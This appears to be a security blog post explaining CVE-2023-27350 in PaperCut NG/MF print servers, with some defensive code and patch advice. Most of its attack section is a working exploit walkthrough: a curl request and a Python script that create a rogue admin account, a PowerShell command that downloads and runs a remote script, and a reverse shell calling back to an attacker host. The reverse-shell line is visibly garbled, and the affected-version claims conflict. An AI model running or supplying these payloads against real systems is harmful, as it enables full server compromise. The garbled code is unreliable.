*Author: Your Exclusive Guide to Real-World IT Security Issues*
What Is CVE-2023-27350?
In March 2023, a critical security flaw was found in PaperCut NG and PaperCut MF print management software, affecting version 22.0.5 (Build 63914) and likely earlier. This vulnerability (tracked as CVE-2023-27350 and ZDI-CAN-18987) allows an attacker on the network to bypass authentication without *any* password and gain remote code execution with SYSTEM-level privileges.
This means, if you run one of these PaperCut servers and don't patch it, an attacker can take over your Windows or Linux box with *zero effort* — no need to log in.
This post explains how the exploit works, why it happens, and provides an example of real-world attack steps with code.
*This content is unique, explaining the exploit in practical, simple terms and showing you exactly what’s going on under the hood.*
TL;DR
- Impacted: PaperCut NG/MF versions 8.0 to 22.0.8 (server software)
Why Did This Happen?
In PaperCut NG, there's a Java class called SetupCompleted. Its main job is to handle first-time configuration and admin account creation. But the developers forgot to limit how this endpoint could be accessed after setup is done.
That means web interface routes like `/setup/complete` can be accessed at any time — not just during installation.
An attacker can send malicious requests here to trick the server into thinking setup isn’t complete, and then create an admin account or grab an auth session as admin.
The mistake: No authentication or “already configured” check on the SetupCompleted function.
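As an added illustration (not PaperCut's code), here is a toy model of the missing check described above: a setup-completion handler with the bug beside a hardened version that refuses once setup has finished, plus a small check that flags hits on the setup endpoint in web access logs, the kind of artifact to look for when hunting for exploitation. The state class, the log format and the log lines are constructed assumptions.

```python
import re
from dataclasses import dataclass, field

@dataclass
class ServerState:                      # constructed stand-in for the app's persisted state
    setup_complete: bool = False
    admins: dict = field(default_factory=dict)   # username -> password (toy store)
    audit: list = field(default_factory=list)

def setup_complete_vulnerable(state, form):
    """Models the bug: nothing checks that setup already ran, so any request
    creates (or overwrites) an admin account."""
    state.admins[form["username"]] = form["password"]
    state.setup_complete = True
    return 200

def setup_complete_fixed(state, form):
    """Hardened: reject once setup has completed, and record the attempt."""
    if state.setup_complete:
        state.audit.append(f"setup-complete rejected for user {form.get('username')!r}")
        return 403
    if not form.get("username") or form.get("password") != form.get("confirm"):
        return 400
    state.admins[form["username"]] = form["password"]
    state.setup_complete = True
    return 200

# Constructed access-log lines (Combined Log Format) for the detection check.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Apr/2023:10:01:02 +0000] "GET /admin HTTP/1.1" 200 512
10.0.0.9 - - [20/Apr/2023:10:03:44 +0000] "POST /setup/complete HTTP/1.1" 200 88
10.0.0.5 - - [20/Apr/2023:10:04:10 +0000] "GET /admin HTTP/1.1" 200 2048
"""
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def setup_endpoint_hits(log_text):
    """Return (client, timestamp, method, status) for every request to the
    setup endpoint; on a server past installation there should be none."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and m.group(4).split("?")[0] == "/setup/complete":
            hits.append((m.group(1), m.group(2), m.group(3), int(m.group(5))))
    return hits
```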
1. Finding the PaperCut Server
Find the PaperCut server, usually running on port 9191 (default) for HTTP or 9192 for HTTPS:
```bash
nmap -p 9191,9192 10.0.0.0/24
```
Look for the login page at `http://target:9191/admin`.
2. The Vulnerable Endpoint
The vulnerable endpoint is `/setup/complete`. Attackers can POST here even after setup is finished.
3. Creating an Admin Account
A simple curl request can break into the admin panel:
```bash
curl -k -X POST \
  "https://target:9192/setup/complete" \
  -d 'fullname=hacker&username=hacker&password=SuperSecret123&confirm=SuperSecret123&setup-complete=Complete+Setup'
```
Boom: if the server is vulnerable, this either creates a new admin account (`hacker`) or sets up a session as admin.
4. Logging In as Admin
Now access https://target:9192/admin with hacker:SuperSecret123 — you have full administrator privileges.
5. Remote Code Execution as SYSTEM
As admin, go to "Actions > Run Command" (or configure a print script that runs custom code). PaperCut runs on Windows as SYSTEM, so any command runs with the highest privilege.
In the PaperCut "Advanced Scripting" editor, an attacker pastes a PowerShell or Bash reverse shell:
```powershell
powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://yourserver/revshell.ps1')"
```
or, on Windows, to get a callback directly:
```powershell
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('attacker_ip',4444);$stream = $client.GetStream();[byte[]]$bytes = ..65535|%{};while(($i = $stream.Read($bytes, , $bytes.Length)) -ne ){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,,$sendbyte.Length);$stream.Flush()}"
```
(Start a listener on your own machine with `nc -lvnp 4444`.)
Here's a simple, barebones Python sample for the Setup Complete abuse:
```python
import requests

target = 'https://target:9192'
s = requests.Session()

# Form fields the setup-completion page expects; the bug is that the
# server accepts them even after installation has already finished.
data = {
    'fullname': 'hacker',
    'username': 'hacker',
    'password': 'SuperSecret123',
    'confirm': 'SuperSecret123',
    'setup-complete': 'Complete Setup'
}

# verify=False skips TLS certificate validation (the server commonly
# presents a self-signed certificate on 9192).
r = s.post(f'{target}/setup/complete', data=data, verify=False)
if r.ok:
    print("Admin account created. Now login at /admin as hacker:SuperSecret123")
else:
    print(f"Request failed with HTTP {r.status_code}; the server may be patched")
```
If you run PaperCut NG/MF servers: PATCH NOW!
- Upgrade to version 22.0.9 or later
- Block external access to ports 9191/9192 on your firewall
More Resources & References
- PaperCut official advisory (PO-1216)
- ZDI advisory (ZDI-23-233)
- CVE record (NVD)
- Rapid7 Exploit/Detection Guide
- TrustedSec Analysis & Tooling
Final Thoughts
CVE-2023-27350 is a classic example of how a small code logic mistake in an install flow can lead to total system compromise. Attackers are actively exploiting this bug in the wild.
If your PaperCut server is exposed and unpatched, it *will* be found and popped. Patch now, check for suspicious accounts, and think carefully about which services you expose to your network!
*Stay safe — and if this helped, share it with your sysadmin and IT friends so they don’t get stung.*
Timeline
Published on: 04/20/2023 16:15:00 UTC
Last modified on: 05/02/2023 16:06:00 UTC